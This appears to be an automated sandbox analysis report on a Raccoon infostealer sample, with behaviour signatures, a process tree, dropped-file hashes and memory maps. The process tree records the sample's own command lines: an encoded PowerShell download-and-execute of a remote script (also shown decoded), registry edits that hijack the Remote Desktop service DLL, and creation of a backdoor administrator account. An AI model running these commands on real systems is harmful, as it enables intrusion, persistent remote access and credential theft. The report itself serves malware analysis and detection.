Analysis
- Max time kernel: 78s
- Max time network: 132s
- Platform: windows10_x64
- Resource: win10v20210408
- Submitted: 03-06-2021 13:06
- Static task: static1
- Behavioral task behavioral1: sample 66ee84542266e55c0215ca60869f1347.exe, resource win7v20210408
- Behavioral task behavioral2: sample 66ee84542266e55c0215ca60869f1347.exe, resource win10v20210408
General
- Target: 66ee84542266e55c0215ca60869f1347.exe
- Size: 567KB
- MD5: 66ee84542266e55c0215ca60869f1347
- SHA1: 147b6dd6bd7b0c5060ded97b844bb1494cf1ddb6
- SHA256: 143cf1724057f9b6a6630656e8735857d6146ff6dd0c2afc736545b46194437c
- SHA512: ead9fc39d6fc972587b777151b040885b7df8eb4ea2bf305f259243915ef2bd190c9e4ea36999442b59b52054a75f07df9d8dd3f380841bb27a13c587b6da2ad
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
- Extracted: raccoon
  - 89ac909b803bacbc6cc523520599c4b9c029b033
  - url4cnc: https://tttttt.me/jdiamond13
Signatures
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes (flow, pid, process):
  - 20, 2124, powershell.exe
  - 22, 2124, powershell.exe
  - 23, 2124, powershell.exe
  - 24, 2124, powershell.exe
  - 26, 2124, powershell.exe
  - 28, 2124, powershell.exe
  - 30, 2124, powershell.exe
  - 32, 2124, powershell.exe
  - 34, 2124, powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (1 IoCs)
  Processes (pid, process):
  - 1720, Y2AJbVsXcq.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
  Processes (resource, yara_rule):
  - \Windows\Branding\mediasrv.png, upx
  - \Windows\Branding\mediasvc.png, upx
- Loads dropped DLL (8 IoCs)
  Processes (pid, process):
  - 2988, 66ee84542266e55c0215ca60869f1347.exe
  - 2988, 66ee84542266e55c0215ca60869f1347.exe
  - 2988, 66ee84542266e55c0215ca60869f1347.exe
  - 2988, 66ee84542266e55c0215ca60869f1347.exe
  - 2988, 66ee84542266e55c0215ca60869f1347.exe
  - 2988, 66ee84542266e55c0215ca60869f1347.exe
  - 2832, (no process name recorded)
  - 2832, (no process name recorded)
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Drops file in Program Files directory (4 IoCs)
  Processes (description, ioc, process):
  - File opened for modification, C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI, powershell.exe
  - File opened for modification, C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT, powershell.exe
  - File opened for modification, C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI, powershell.exe
  - File opened for modification, C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT, powershell.exe
- Drops file in Windows directory (19 IoCs)
  Processes (description, ioc, process):
  - File opened for modification, C:\Windows\branding\mediasvc.png, powershell.exe
  - File opened for modification, C:\Windows\branding\wupsvc.jpg, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qbk1rc1e.mpq.ps1, powershell.exe
  - File created, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI14B4.tmp, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI14C4.tmp, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI14D5.tmp, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log, powershell.exe
  - File created, C:\Windows\branding\wupsvc.jpg, powershell.exe
  - File opened for modification, C:\Windows\branding\Basebrd, powershell.exe
  - File opened for modification, C:\Windows\branding\mediasrv.png, powershell.exe
  - File created, C:\Windows\branding\mediasrv.png, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vcd0fbpd.41a.psm1, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI1444.tmp, powershell.exe
  - File opened for modification, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat, powershell.exe
  - File created, C:\Windows\branding\mediasvc.png, powershell.exe
  - File opened for modification, C:\Windows\branding\ShellBrd, powershell.exe
  - File opened for modification, C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI14A3.tmp, powershell.exe
  - File created, C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Delays execution with timeout.exe (1 IoCs)
  Processes (pid, process):
  - 2496, timeout.exe
- Modifies data under HKEY_USERS (64 IoCs)
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (2 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description, flow, ioc):
  - HTTP User-Agent header, 22, Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, 24, Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes (pid, process):
  - 2688, powershell.exe
  - 2688, powershell.exe
  - 2688, powershell.exe
  - 1384, powershell.exe
  - 1384, powershell.exe
  - 1384, powershell.exe
  - 3808, powershell.exe
  - 3808, powershell.exe
  - 3808, powershell.exe
  - 1244, powershell.exe
  - 1244, powershell.exe
  - 1244, powershell.exe
  - 2688, powershell.exe
  - 2688, powershell.exe
  - 2688, powershell.exe
  - 2124, powershell.exe
  - 2124, powershell.exe
  - 2124, powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes (pid, process):
  - 620, (no process name recorded)
  - 620, (no process name recorded)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes
- C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe"
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exe"
    Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      Signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6A3.tmp" "c:\Users\Admin\AppData\Local\Temp\2n50zo5s\CSC396F2BCDAA27415EA11A9BA7FDC1FD5.TMP"
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\reg.exe
        Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      - C:\Windows\system32\reg.exe
        Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        Signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      - C:\Windows\system32\net.exe
        Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe
          Command line: cmd /c net start rdpdr
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net.exe
            Command line: net start rdpdr
            Signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 start rdpdr
      - C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\cmd.exe
          Command line: cmd /c net start TermService
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net.exe
            Command line: net start TermService
            Signatures: Suspicious use of WriteProcessMemory
            - C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 start TermService
      - C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      - C:\Windows\system32\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
  - C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\66ee84542266e55c0215ca60869f1347.exe"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\timeout.exe
      Command line: timeout /T 10 /NOBREAK
      Signatures: Delays execution with timeout.exe
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc Ghar4f5 /del
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc Ghar4f5 /del
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc 27WEG86E /add
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc 27WEG86E /add
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc 27WEG86E /add
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user wgautilacc 27WEG86E
  - C:\Windows\system32\net.exe
    Command line: net.exe user wgautilacc 27WEG86E
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc 27WEG86E
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Decoded -enc argument (base64 of UTF-16LE, decoded for this report; the URL matches the extracted config above): IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1")
      Signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C net user wgautilacc 1234
  - C:\Windows\system32\net.exe
    Command line: net user wgautilacc 1234
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user wgautilacc 1234
Downloads
-
C:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.dllMD5
6b45c158c0142e7fe26e9517bc853a31
SHA1e84441f6a39c7688b165efea73b14c7320fff13c
SHA2568298870da40cba6b86f30c392404ce3404c32c36da37ebe3e808ba642bd2dc8c
SHA512882c2e1a54595041aa432d20be1cfd1d709e4c2ce10da22d9d535f21bba2348bdba3aba9fc2bfa523279d3c5ac1d2c7a07840ac0765682c6e83b051e1ddb4a03
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
b2207567c6a62b42655772770ce2a4e6
SHA151074ad655105f0c496f4017e8afee90d9cab900
SHA256d7b206f39b6f6996cb9472df9fa350ab9da7f1eca47f782c4e5d05ca338daaab
SHA51285d8eb5772d672b1e84b3f09048c207ed7ecaa7f68f14dc34baa34dd49ed0d674ff150eec20932e468a7a4d17d91d22caa639fe8d9bab0bed0105c4c38631bb5
-
C:\Users\Admin\AppData\Local\Temp\RESB6A3.tmpMD5
4546e1b20ae249b3b97789431845df7d
SHA181322443c226336c15f848a70f1df1ad0ce36bb7
SHA256679f66b63e7edcaddc00c7fc1289f2daa103b60652ea90ba0fa6191f3af40017
SHA512a55cea99aa0eab5f443a79737c7714df821e76e124648c022275f94bd179d757176cdd7b7c09be08d31fab18d46bd01217d1f28575c1cf25b11a4f4387f753b5
-
C:\Users\Admin\AppData\Local\Temp\Y2AJbVsXcq.exe
MD5 aa80d5960e65ac46ad446c09c1a17608
SHA1 c2468b1792e5ecef461d2d89470e8438c05cce24
SHA256 857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c
SHA512 07e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5 065cc96fec70546c9f195f703e4d657b
SHA1 9da24636d8fd3de61f46ff7282640d3fa27d6b45
SHA256 cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3
SHA512 a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0
-
\??\c:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.0.cs
MD5 df390bc8a088b51d27253fed32186361
SHA1 69e6a59300fc04ef5ab53cbe061b8b2aefe375a4
SHA256 4388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f
SHA512 4d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8
-
\??\c:\Users\Admin\AppData\Local\Temp\2n50zo5s\2n50zo5s.cmdline
MD5 0e81c1db6e6d18e3eb0a90640a848561
SHA1 0a1f8fd66cf98523b54e82aba40628893aed243e
SHA256 c95467ba12392c4878f251b40d1296754bcee72c7193929a1cc3aca1f9b1c64c
SHA512 f2f0bc3f8235ab8d1727e96526f973e367fe664c45b565c421e1419bab82c8781a013ea095f8c760de284dc27e5a9331c8740a1fe575a155eb81d6318e089f29
-
\??\c:\Users\Admin\AppData\Local\Temp\2n50zo5s\CSC396F2BCDAA27415EA11A9BA7FDC1FD5.TMP
MD5 243aa15a7018198b56d08105b12f765b
SHA1 eae0e27cd3844b8502f5133367a134d6c1c46368
SHA256 e05187476e3cf9806ea918fed9595a229ee0d03f5472fc3c8d3f3a8cab33a95e
SHA512 4ceb831ec76876a8a1adb5cc0887278f7ba018869755852e364b2246376340ea57302bf550894b9d12b7289d8ec710a0b3cc6b1d652f5166c7f3f8f314612053
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll
MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dll
MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll
MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
-
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.png
MD5 1da8e368cb917044f7440a54d79f6737
SHA1 df60dd7011bc948f3b871b1a6cb149a7028c1a85
SHA256 dce86185269e01eba9301b761ae9a002054713060e35dbc908d44ddd8e647bd4
SHA512 8437463516b7da13a661d5acdadd8d52641464e797831e635d697aa863c2c01b3f15be67073d08f2d9361f639b4ee1eaf9a0c8b2811f3cd3d78c43e55651fa92
-
\Windows\Branding\mediasvc.png
MD5 009e8b6a916836a4a8aa2be3229276a1
SHA1 28f3892fb8b63e7299dce25cb65bf252e29d5afd
SHA256 39ec650a006fc423825d552edf526443c96b5a027f58e6423e6344d90b228ab7
SHA512 a47a29ce28659d2839d808a614d9537fdcefcc08509f5e0cab0c747ebb7f04453781647e475934b4db5e254127e8621cedab01efd425fb5af23cac8dfcf9d7dc
-
memory/212-250-0x0000000000000000-mapping.dmp
-
memory/212-231-0x0000000000000000-mapping.dmp
-
memory/996-151-0x0000000000000000-mapping.dmp
-
memory/1244-217-0x0000000000000000-mapping.dmp
-
memory/1244-219-0x0000020A7F730000-0x0000020A7F732000-memory.dmp
Filesize 8KB
-
memory/1244-221-0x0000020A7F736000-0x0000020A7F738000-memory.dmp
Filesize 8KB
-
memory/1244-220-0x0000020A7F733000-0x0000020A7F735000-memory.dmp
Filesize 8KB
-
memory/1244-222-0x0000020A7F738000-0x0000020A7F73A000-memory.dmp
Filesize 8KB
-
memory/1284-155-0x0000000000000000-mapping.dmp
-
memory/1324-243-0x0000000000000000-mapping.dmp
-
memory/1384-213-0x00000203331C8000-0x00000203331CA000-memory.dmp
Filesize 8KB
-
memory/1384-203-0x00000203331C6000-0x00000203331C8000-memory.dmp
Filesize 8KB
-
memory/1384-181-0x00000203331C3000-0x00000203331C5000-memory.dmp
Filesize 8KB
-
memory/1384-180-0x00000203331C0000-0x00000203331C2000-memory.dmp
Filesize 8KB
-
memory/1384-173-0x0000000000000000-mapping.dmp
-
memory/1524-262-0x0000000000000000-mapping.dmp
-
memory/1528-225-0x0000000000000000-mapping.dmp
-
memory/1612-228-0x0000000000000000-mapping.dmp
-
memory/1720-126-0x00000241EF9E0000-0x00000241EFE01000-memory.dmp
Filesize 4.1MB
-
memory/1720-131-0x00000241EF5A5000-0x00000241EF5A6000-memory.dmp
Filesize 4KB
-
memory/1720-130-0x00000241EF5A3000-0x00000241EF5A5000-memory.dmp
Filesize 8KB
-
memory/1720-129-0x00000241EF5A0000-0x00000241EF5A2000-memory.dmp
Filesize 8KB
-
memory/1720-122-0x0000000000000000-mapping.dmp
-
memory/1720-132-0x00000241EF5A6000-0x00000241EF5A7000-memory.dmp
Filesize 4KB
-
memory/1908-245-0x0000000000000000-mapping.dmp
-
memory/1928-230-0x0000000000000000-mapping.dmp
-
memory/2124-258-0x000002C979378000-0x000002C979379000-memory.dmp
Filesize 4KB
-
memory/2124-242-0x0000000000000000-mapping.dmp
-
memory/2124-254-0x0000000000000000-mapping.dmp
-
memory/2124-257-0x000002C979376000-0x000002C979378000-memory.dmp
Filesize 8KB
-
memory/2124-256-0x000002C979373000-0x000002C979375000-memory.dmp
Filesize 8KB
-
memory/2124-255-0x000002C979370000-0x000002C979372000-memory.dmp
Filesize 8KB
-
memory/2220-260-0x0000000000000000-mapping.dmp
-
memory/2240-248-0x0000000000000000-mapping.dmp
-
memory/2480-239-0x0000000000000000-mapping.dmp
-
memory/2496-127-0x0000000000000000-mapping.dmp
-
memory/2496-251-0x0000000000000000-mapping.dmp
-
memory/2648-241-0x0000000000000000-mapping.dmp
-
memory/2660-261-0x0000000000000000-mapping.dmp
-
memory/2688-141-0x0000024E712F3000-0x0000024E712F5000-memory.dmp
Filesize 8KB
-
memory/2688-223-0x0000024E712F8000-0x0000024E712F9000-memory.dmp
Filesize 4KB
-
memory/2688-159-0x0000024E71240000-0x0000024E71241000-memory.dmp
Filesize 4KB
-
memory/2688-166-0x0000024E72CC0000-0x0000024E72CC1000-memory.dmp
Filesize 4KB
-
memory/2688-154-0x0000024E712F6000-0x0000024E712F8000-memory.dmp
Filesize 8KB
-
memory/2688-133-0x0000000000000000-mapping.dmp
-
memory/2688-165-0x0000024E72930000-0x0000024E72931000-memory.dmp
Filesize 4KB
-
memory/2688-143-0x0000024E71580000-0x0000024E71581000-memory.dmp
Filesize 4KB
-
memory/2688-139-0x0000024E712F0000-0x0000024E712F2000-memory.dmp
Filesize 8KB
-
memory/2688-138-0x0000024E71250000-0x0000024E71251000-memory.dmp
Filesize 4KB
-
memory/2772-244-0x0000000000000000-mapping.dmp
-
memory/2776-235-0x0000000000000000-mapping.dmp
-
memory/2884-246-0x0000000000000000-mapping.dmp
-
memory/2988-114-0x0000000002230000-0x00000000022C1000-memory.dmp
Filesize 580KB
-
memory/2988-115-0x0000000000400000-0x0000000000496000-memory.dmp
Filesize 600KB
-
memory/3000-259-0x0000000000000000-mapping.dmp
-
memory/3028-229-0x0000000000000000-mapping.dmp
-
memory/3112-240-0x0000000000000000-mapping.dmp
-
memory/3112-226-0x0000000000000000-mapping.dmp
-
memory/3120-232-0x0000000000000000-mapping.dmp
-
memory/3324-236-0x0000000000000000-mapping.dmp
-
memory/3460-224-0x0000000000000000-mapping.dmp
-
memory/3580-253-0x0000000000000000-mapping.dmp
-
memory/3580-125-0x0000000000000000-mapping.dmp
-
memory/3648-249-0x0000000000000000-mapping.dmp
-
memory/3676-233-0x0000000000000000-mapping.dmp
-
memory/3752-247-0x0000000000000000-mapping.dmp
-
memory/3808-212-0x0000000000000000-mapping.dmp
-
memory/3808-214-0x000001C368290000-0x000001C368292000-memory.dmp
Filesize 8KB
-
memory/3808-216-0x000001C368296000-0x000001C368298000-memory.dmp
Filesize 8KB
-
memory/3808-215-0x000001C368293000-0x000001C368295000-memory.dmp
Filesize 8KB
-
memory/3808-218-0x000001C368298000-0x000001C36829A000-memory.dmp
Filesize 8KB
-
memory/3936-234-0x0000000000000000-mapping.dmp
-
memory/3948-227-0x0000000000000000-mapping.dmp
-
memory/3952-252-0x0000000000000000-mapping.dmp